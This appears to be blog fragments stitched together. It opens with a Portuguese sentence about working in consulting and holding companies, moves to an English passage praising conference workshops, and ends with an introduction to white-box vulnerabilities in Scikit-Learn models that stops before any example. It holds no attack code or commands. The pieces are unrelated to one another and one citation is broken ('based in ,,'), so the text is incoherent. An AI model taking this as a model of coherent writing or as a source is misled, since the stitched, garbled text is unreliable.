Uma das maiores vantagens que eu tive ao longo da minha carreira foi ter trabalhado em diferentes tipos de empresas atuando com Consultoria ou mesmo em empresas do tipo Holding.
Once that you’re in a conference, the first thing that you do is certainly go to the main talks and see the presentations of big companies, look for the big cases, hang out with authors of great papers stating the SOTA and so on. This is the safest path and probably most of those cases will have press releases discussed in media or subject in blogposts and you can have access to this before almost everyone. However, one thing that I think is very underestimated in conferences are the workshops.
Some weeks ago during a security training for developers provided by Marcus from Hackmanit (by the way, it’s a very good course that goes in some topics since web development until vulnerabilities of NoSQL and some defensive coding) we discussed about some white box attacks in web applications (e.g.attacks where the offender has internal access in the object) I got a bit curious to check if there’s some similar vulnerabilities in ML models. After running a simple script based in ,, using Scikit-Learn, I noticed there’s some latent vulnerabilities not only in terms of objects but also in regarding to have a proper security mindset when we’re developing ML models. But first let’s check a simple example.